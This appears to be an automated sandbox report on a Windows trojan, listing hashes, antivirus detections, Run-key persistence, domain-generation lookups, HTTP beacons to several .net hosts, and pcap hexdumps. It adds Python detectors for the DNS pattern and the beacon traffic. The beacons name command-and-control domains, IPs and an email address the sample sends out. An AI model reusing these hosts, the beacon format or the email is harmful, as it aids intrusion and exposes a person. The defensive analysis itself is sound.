Analysis Date: 2015-10-31 19:48:59
MD5: b201d7e97cec6bbbdd0d64f20fc3b56b
SHA1: 3506405c909ee3e2c5e3c18a81dbe40290244d92

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text   md5: 3ebdaadd35437372b5e866962b231ecf   sha1: bacf8c5b2ada4d7f247478a6be4d3be6fad048eb   size: 292864
Section .rdata  md5: 6b85667ae64f49b8f3e7a053632566af   sha1: 3037a8c0b20b934c889d350ab5e18a0f20791fb2   size: 34304
Section .data   md5: c2d28bc3cbbd52f6f03518641880dff4   sha1: 67a1a7334cf9dbd5df507adc3b7c5a3d9ce88436   size: 88576
Timestamp: 2014-10-30 10:29:27
Packer: Microsoft Visual C++ ?.?
PEhash: 18b483a58ab2cea403826a9f552c476b0d9152d0
IMPhash: a6a5c918b6d432a25a3b257a7fe8db23
AV Rising: 0x592e592d
AV Mcafee: Trojan-FEMT!B201D7E97CEC
AV Avira (antivir): TR/Crypt.ZPACK.Gen8
AV Twister: Trojan.Agent.VNC.aanx.mg
AV Ad-Aware: Gen:Variant.Symmi.22722
AV Alwil (avast): Downloader-TLD [Trj]
AV Eset (nod32): Win32/Rodecap.BE
AV Grisoft (avg): Win32/Cryptor
AV Symantec: Downloader.Upatre!g15
AV Fortinet: W32/Agent.VNC!tr
AV BitDefender: Gen:Variant.Symmi.22722
AV K7: Trojan ( 004cb2771 )
AV Microsoft Security Essentials: TrojanSpy:Win32/Nivdort.BD
AV MicroWorld (escan): Gen:Variant.Symmi.22722
AV MalwareBytes: Trojan.Zbot.WHE
AV Authentium: W32/Wonton.B.gen!Eldorado
AV Frisk (f-prot): no_virus
AV Ikarus: Trojan.FBAccountLock
AV Emsisoft: Gen:Variant.Symmi.22722
AV Zillya!: no_virus
AV Kaspersky: Trojan.Win32.Generic
AV Trend Micro: TROJ_FORUCON.BMC
AV CAT (quickheal): Trojan.Dynamer.AC3
AV VirusBlokAda (vba32): no_virus
AV Padvish: no_virus
AV BullGuard: Gen:Variant.Symmi.22722
AV Arcabit (arcavir): Gen:Variant.Symmi.22722
AV ClamAV: no_virus
AV Dr. Web: Trojan.DownLoader12.12885
AV F-Secure: Gen:Variant.Symmi.22722
AV CA (E-Trust Ino): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Office Superfetch Routing Video Extender ➝ C:\Documents and Settings\Administrator\Application Data\rycpxzngrvewd\msfzkpnta.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\rycpxzngrvewd\msfzkpnta.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\rycpxzngrvewd\msfzkpnta.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\rycpxzngrvewd\msfzkpnta.exe

Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\rycpxzngrvewd\msfzkpnta.ord
Creates File: C:\Documents and Settings\Administrator\Application Data\rycpxzngrvewd\gmlackt.exe
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\rycpxzngrvewd\msfzkpnta.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\rycpxzngrvewd\msfzkpnta.exe"

Network Details:

DNS (A) melbourneit.hotkeysparking.com ➝ 8.5.1.16
DNS (A) thinksystem.net ➝ 69.161.143.132
DNS (A) collegehonor.net ➝ 54.186.220.79
DNS (A) alonehonor.net ➝ 98.139.135.129
DNS (A) aloneneither.net ➝ 195.22.26.252, 195.22.26.253, 195.22.26.254, 195.22.26.231
DNS (A) hdredirect-lb-399551664.us-east-1.elb.amazonaws.com ➝ 54.174.31.254, 54.208.74.215
DNS (A) classtrust.net ➝ 208.100.26.234
DNS (A) strangereceive.net ➝ no answer recorded
DNS (A) historyreceive.net ➝ no answer recorded
DNS (A) strangequarter.net ➝ no answer recorded
DNS (A) historyquarter.net ➝ no answer recorded
DNS (A) amountbranch.net ➝ no answer recorded
DNS (A) weatherbranch.net ➝ no answer recorded
DNS (A) amountbelieve.net ➝ no answer recorded
DNS (A) weatherbelieve.net ➝ no answer recorded
DNS (A) amountreceive.net ➝ no answer recorded
DNS (A) weatherreceive.net ➝ no answer recorded
DNS (A) amountquarter.net ➝ no answer recorded
DNS (A) weatherquarter.net ➝ no answer recorded
DNS (A) thickbranch.net ➝ no answer recorded
DNS (A) classbranch.net ➝ no answer recorded
DNS (A) thickbelieve.net ➝ no answer recorded
DNS (A) classbelieve.net ➝ no answer recorded
DNS (A) thickreceive.net ➝ no answer recorded
DNS (A) classreceive.net ➝ no answer recorded
DNS (A) thickquarter.net ➝ no answer recorded
DNS (A) classquarter.net ➝ no answer recorded
DNS (A) thinkhonor.net ➝ no answer recorded
DNS (A) presenthonor.net ➝ no answer recorded
DNS (A) thinkneither.net ➝ no answer recorded
DNS (A) presentneither.net ➝ no answer recorded
DNS (A) presentsystem.net ➝ no answer recorded
DNS (A) thinktrust.net ➝ no answer recorded
DNS (A) presenttrust.net ➝ no answer recorded
DNS (A) chiefhonor.net ➝ no answer recorded
DNS (A) chiefneither.net ➝ no answer recorded
DNS (A) collegeneither.net ➝ no answer recorded
DNS (A) chiefsystem.net ➝ no answer recorded
DNS (A) collegesystem.net ➝ no answer recorded
DNS (A) chieftrust.net ➝ no answer recorded
DNS (A) collegetrust.net ➝ no answer recorded
DNS (A) oftenhonor.net ➝ no answer recorded
DNS (A) oftenneither.net ➝ no answer recorded
DNS (A) oftensystem.net ➝ no answer recorded
DNS (A) alonesystem.net ➝ no answer recorded
DNS (A) oftentrust.net ➝ no answer recorded
DNS (A) alonetrust.net ➝ no answer recorded
DNS (A) middlehonor.net ➝ no answer recorded
DNS (A) twelvehonor.net ➝ no answer recorded
DNS (A) middleneither.net ➝ no answer recorded
DNS (A) twelveneither.net ➝ no answer recorded
DNS (A) middlesystem.net ➝ no answer recorded
DNS (A) twelvesystem.net ➝ no answer recorded
DNS (A) middletrust.net ➝ no answer recorded
DNS (A) twelvetrust.net ➝ no answer recorded
DNS (A) ratherhonor.net ➝ no answer recorded
DNS (A) morninghonor.net ➝ no answer recorded
DNS (A) ratherneither.net ➝ no answer recorded
DNS (A) morningneither.net ➝ no answer recorded
DNS (A) rathersystem.net ➝ no answer recorded
DNS (A) morningsystem.net ➝ no answer recorded
DNS (A) rathertrust.net ➝ no answer recorded
DNS (A) morningtrust.net ➝ no answer recorded
DNS (A) strangehonor.net ➝ no answer recorded
DNS (A) historyhonor.net ➝ no answer recorded
DNS (A) strangeneither.net ➝ no answer recorded
DNS (A) historyneither.net ➝ no answer recorded
DNS (A) strangesystem.net ➝ no answer recorded
DNS (A) historysystem.net ➝ no answer recorded
DNS (A) strangetrust.net ➝ no answer recorded
DNS (A) historytrust.net ➝ no answer recorded
DNS (A) amounthonor.net ➝ no answer recorded
DNS (A) weatherhonor.net ➝ no answer recorded
DNS (A) amountneither.net ➝ no answer recorded
DNS (A) weatherneither.net ➝ no answer recorded
DNS (A) amountsystem.net ➝ no answer recorded
DNS (A) weathersystem.net ➝ no answer recorded
DNS (A) amounttrust.net ➝ no answer recorded
DNS (A) weathertrust.net ➝ no answer recorded
DNS (A) thickhonor.net ➝ no answer recorded
DNS (A) classhonor.net ➝ no answer recorded
DNS (A) thickneither.net ➝ no answer recorded
DNS (A) classneither.net ➝ no answer recorded
DNS (A) thicksystem.net ➝ no answer recorded
DNS (A) classsystem.net ➝ no answer recorded
DNS (A) thicktrust.net ➝ no answer recorded
DNS (A) thinklaughter.net ➝ no answer recorded
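
The lookups above are all for .net domains assembled from two common English words, and most of them returned no answer. Character-entropy DGA heuristics score such names like ordinary domains, so the added example below (not part of this report and not the sample's own code) keys on what is actually visible here: one client issuing many lookups for two-dictionary-word apex domains with a high unresolved ratio. The word list is built from the domain components on this page, the log records are constructed from the DNS section with a second benign client added for contrast, and the log format, thresholds and function names are assumptions for the demo.

```python
"""Flag clients that churn through many unresolved two-word apex domains.

Added example, not code from the sandbox report or the sample. Word list,
log format, sample records and thresholds are constructed for this demo.
"""
from collections import defaultdict

# Component words seen in the report's DNS queries. In production this would
# be a real dictionary (lowercase, 4+ letters) rather than a hand-picked set.
WORDS = {
    "alone", "amount", "believe", "branch", "chief", "class", "college",
    "history", "honor", "laughter", "middle", "morning", "neither", "often",
    "present", "quarter", "rather", "receive", "strange", "system", "thick",
    "think", "trust", "twelve", "weather",
}

# Constructed log: "<epoch> <client> <query> <answer or ->". 192.168.1.1 is
# the client from the report's flows; 192.168.1.50 is a made-up benign host.
DNS_LOG = """\
1446320940 192.168.1.1 thinksystem.net 69.161.143.132
1446320941 192.168.1.1 collegehonor.net 54.186.220.79
1446320941 192.168.1.1 alonehonor.net 98.139.135.129
1446320942 192.168.1.1 aloneneither.net 195.22.26.252
1446320942 192.168.1.1 strangereceive.net -
1446320942 192.168.1.1 historyreceive.net -
1446320943 192.168.1.1 strangequarter.net -
1446320943 192.168.1.1 historyquarter.net -
1446320943 192.168.1.1 amountbranch.net -
1446320944 192.168.1.1 weatherbranch.net -
1446320944 192.168.1.1 amountbelieve.net -
1446320944 192.168.1.1 weatherbelieve.net -
1446320945 192.168.1.1 thickquarter.net -
1446320945 192.168.1.1 classsystem.net -
1446320945 192.168.1.1 thinklaughter.net -
1446320950 192.168.1.50 www.example.com 203.0.113.10
1446320951 192.168.1.50 mail.example.org -
1446320952 192.168.1.50 classhonor.net -
"""


def split_two_words(label):
    """Return (w1, w2) if label is exactly two dictionary words, else None."""
    for i in range(1, len(label)):
        head, tail = label[:i], label[i:]
        if head in WORDS and tail in WORDS:
            return head, tail
    return None


def parse_dns_log(text):
    """Parse the constructed log into (ts, client, query, answer) tuples."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, query, answer = line.split()
        query = query.lower().rstrip(".")
        records.append((int(ts), client, query, None if answer == "-" else answer))
    return records


def flag_clients(records, min_lookups=8, min_unresolved_ratio=0.5):
    """Return sorted [(client, two_word_lookups, unresolved)] over threshold."""
    stats = defaultdict(lambda: [0, 0])  # client -> [two-word lookups, unresolved]
    for _ts, client, query, answer in records:
        parts = query.split(".")
        if len(parts) != 2:  # only bare apex names like classsystem.net
            continue
        if split_two_words(parts[0]) is None:
            continue
        stats[client][0] += 1
        if answer is None:
            stats[client][1] += 1
    flagged = []
    for client, (total, unresolved) in stats.items():
        if total >= min_lookups and unresolved / total >= min_unresolved_ratio:
            flagged.append((client, total, unresolved))
    return sorted(flagged)


if __name__ == "__main__":
    for client, total, unresolved in flag_clients(parse_dns_log(DNS_LOG)):
        print(f"{client}: {total} two-word apex lookups, {unresolved} unresolved")
```

On the constructed log this flags 192.168.1.1 only (15 two-word lookups, 11 unresolved); the single classhonor.net miss from the benign host stays below the lookup threshold. Thresholds should be tuned to the window and volume of the real resolver logs they are run against.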
HTTP GET http://strangequarter.net/index.php?email=metkar@seanet.ro&method=post&len
User-Agent: (none)
HTTP GET http://thinksystem.net/index.php?email=metkar@seanet.ro&method=post&len
User-Agent: (none)
HTTP GET http://collegehonor.net/index.php?email=metkar@seanet.ro&method=post&len
User-Agent: (none)
HTTP GET http://alonehonor.net/index.php?email=metkar@seanet.ro&method=post&len
User-Agent: (none)
HTTP GET http://aloneneither.net/index.php?email=metkar@seanet.ro&method=post&len
User-Agent: (none)
HTTP GET http://classsystem.net/index.php?email=metkar@seanet.ro&method=post&len
User-Agent: (none)
HTTP GET http://classtrust.net/index.php?email=metkar@seanet.ro&method=post&len
User-Agent: (none)
Flows TCP 192.168.1.1:1031 ➝ 8.5.1.16:80
Flows TCP 192.168.1.1:1032 ➝ 69.161.143.132:80
Flows TCP 192.168.1.1:1033 ➝ 54.186.220.79:80
Flows TCP 192.168.1.1:1034 ➝ 98.139.135.129:80
Flows TCP 192.168.1.1:1035 ➝ 195.22.26.252:80
Flows TCP 192.168.1.1:1036 ➝ 54.174.31.254:80
Flows TCP 192.168.1.1:1037 ➝ 208.100.26.234:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 6b617240 7365616e   mail=metkar@sean
0x00000020 (00032)   65742e72 6f266d65 74686f64 3d706f73   et.ro&method=pos
0x00000030 (00048)   74266c65 6e204854 54502f31 2e300d0a   t&len HTTP/1.0..
0x00000040 (00064)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000050 (00080)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000060 (00096)   486f7374 3a207374 72616e67 65717561   Host: strangequa
0x00000070 (00112)   72746572 2e6e6574 0d0a0d0a            rter.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 6b617240 7365616e   mail=metkar@sean
0x00000020 (00032)   65742e72 6f266d65 74686f64 3d706f73   et.ro&method=pos
0x00000030 (00048)   74266c65 6e204854 54502f31 2e300d0a   t&len HTTP/1.0..
0x00000040 (00064)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000050 (00080)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000060 (00096)   486f7374 3a207468 696e6b73 79737465   Host: thinksyste
0x00000070 (00112)   6d2e6e65 740d0a0d 0a0a0d0a            m.net.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 6b617240 7365616e   mail=metkar@sean
0x00000020 (00032)   65742e72 6f266d65 74686f64 3d706f73   et.ro&method=pos
0x00000030 (00048)   74266c65 6e204854 54502f31 2e300d0a   t&len HTTP/1.0..
0x00000040 (00064)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000050 (00080)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000060 (00096)   486f7374 3a20636f 6c6c6567 65686f6e   Host: collegehon
0x00000070 (00112)   6f722e6e 65740d0a 0d0a0d0a            or.net......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 6b617240 7365616e   mail=metkar@sean
0x00000020 (00032)   65742e72 6f266d65 74686f64 3d706f73   et.ro&method=pos
0x00000030 (00048)   74266c65 6e204854 54502f31 2e300d0a   t&len HTTP/1.0..
0x00000040 (00064)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000050 (00080)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000060 (00096)   486f7374 3a20616c 6f6e6568 6f6e6f72   Host: alonehonor
0x00000070 (00112)   2e6e6574 0d0a0d0a 0d0a0d0a            .net........

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 6b617240 7365616e   mail=metkar@sean
0x00000020 (00032)   65742e72 6f266d65 74686f64 3d706f73   et.ro&method=pos
0x00000030 (00048)   74266c65 6e204854 54502f31 2e300d0a   t&len HTTP/1.0..
0x00000040 (00064)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000050 (00080)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000060 (00096)   486f7374 3a20616c 6f6e656e 65697468   Host: aloneneith
0x00000070 (00112)   65722e6e 65740d0a 0d0a0d0a            er.net......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 6b617240 7365616e   mail=metkar@sean
0x00000020 (00032)   65742e72 6f266d65 74686f64 3d706f73   et.ro&method=pos
0x00000030 (00048)   74266c65 6e204854 54502f31 2e300d0a   t&len HTTP/1.0..
0x00000040 (00064)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000050 (00080)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000060 (00096)   486f7374 3a20636c 61737373 79737465   Host: classsyste
0x00000070 (00112)   6d2e6e65 740d0a0d 0a0a0d0a            m.net.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 6b617240 7365616e   mail=metkar@sean
0x00000020 (00032)   65742e72 6f266d65 74686f64 3d706f73   et.ro&method=pos
0x00000030 (00048)   74266c65 6e204854 54502f31 2e300d0a   t&len HTTP/1.0..
0x00000040 (00064)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000050 (00080)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000060 (00096)   486f7374 3a20636c 61737374 72757374   Host: classtrust
0x00000070 (00112)   2e6e6574 0d0a0d0a 0a0a0d0a            .net........
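
The seven request dumps above are byte-for-byte identical apart from the Host header. The added example below (my code, not the report's and not the sample's) rebuilds the raw bytes from this hexdump layout, parses the HTTP/1.0 request and checks it against the traits every request in the section shares: GET /index.php with email=, method=post and a bare len parameter, HTTP/1.0, Connection: close and no User-Agent header. Two of the dumps are embedded, copied from the section above; the function names, the benign comparison request and the IOC field names are assumptions for the demo.

```python
"""Rebuild the HTTP beacons from the report's raw pcap dumps and check them.

Added example, not code from the sandbox report or the sample. The two dumps
are copied from the "Raw Pcap" section; the benign request is constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# "0x<offset> (<decimal>)   <hex groups>   <ascii column>". Hex groups are
# taken until the first token that is not pure hex; assumption: the ascii
# column never starts with a run of hex digits followed by whitespace.
HEX_LINE = re.compile(r"^0x[0-9A-Fa-f]+\s+\(\d+\)\s+((?:[0-9A-Fa-f]{2,8}\s)+)")

DUMP_STRANGEQUARTER = """\
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 6b617240 7365616e   mail=metkar@sean
0x00000020 (00032)   65742e72 6f266d65 74686f64 3d706f73   et.ro&method=pos
0x00000030 (00048)   74266c65 6e204854 54502f31 2e300d0a   t&len HTTP/1.0..
0x00000040 (00064)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000050 (00080)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000060 (00096)   486f7374 3a207374 72616e67 65717561   Host: strangequa
0x00000070 (00112)   72746572 2e6e6574 0d0a0d0a            rter.net....
"""

DUMP_CLASSTRUST = """\
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 6b617240 7365616e   mail=metkar@sean
0x00000020 (00032)   65742e72 6f266d65 74686f64 3d706f73   et.ro&method=pos
0x00000030 (00048)   74266c65 6e204854 54502f31 2e300d0a   t&len HTTP/1.0..
0x00000040 (00064)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000050 (00080)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000060 (00096)   486f7374 3a20636c 61737374 72757374   Host: classtrust
0x00000070 (00112)   2e6e6574 0d0a0d0a 0a0a0d0a            .net........
"""

# Constructed for contrast, not from the report: a browser-style request.
BENIGN_REQUEST = (
    b"GET /index.php?id=1 HTTP/1.1\r\nHost: www.example.com\r\n"
    b"User-Agent: Mozilla/5.0\r\nAccept: */*\r\n\r\n"
)


def parse_hexdump(text):
    """Concatenate the hex groups of every dump line into raw packet bytes."""
    out = bytearray()
    for line in text.splitlines():
        m = HEX_LINE.match(line)
        if m:
            out += bytes.fromhex(m.group(1))
    return bytes(out)


def parse_http_request(raw):
    """Split a raw HTTP/1.x request into method, path, query dict and headers."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("end of headers not found")
    lines = head.decode("latin-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    return {
        "method": method,
        "path": url.path,
        "query": parse_qs(url.query, keep_blank_values=True),  # keeps bare "len"
        "version": version,
        "headers": headers,
        "body": body,
    }


def beacon_indicators(req):
    """Each trait of the observed beacon; a match shows all of them."""
    q = req["query"]
    return {
        "get_index_php": req["method"] == "GET" and req["path"] == "/index.php",
        "email_post_len": "email" in q and q.get("method") == ["post"] and "len" in q,
        "http_1_0": req["version"] == "HTTP/1.0",
        "no_user_agent": "user-agent" not in req["headers"],
        "connection_close": req["headers"].get("connection", "").lower() == "close",
    }


def is_beacon(req):
    return all(beacon_indicators(req).values())


def extract_iocs(req):
    """The contacted host and the email value the sample sends."""
    return {"host": req["headers"].get("host"), "email": req["query"].get("email", [None])[0]}


if __name__ == "__main__":
    for dump in (DUMP_STRANGEQUARTER, DUMP_CLASSTRUST):
        req = parse_http_request(parse_hexdump(dump))
        print(is_beacon(req), extract_iocs(req))
    print(is_beacon(parse_http_request(BENIGN_REQUEST)))
```

Both embedded dumps match all five traits and yield the same email value with different hosts; the constructed browser-style request fails on the query parameters, the HTTP version and the User-Agent header. Note the trailing bytes after the final CRLFCRLF in some dumps (for example `0a0a0d0a` in the classtrust.net dump): the parser stops at the first end-of-headers marker, so they are ignored rather than misread as a body.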


Strings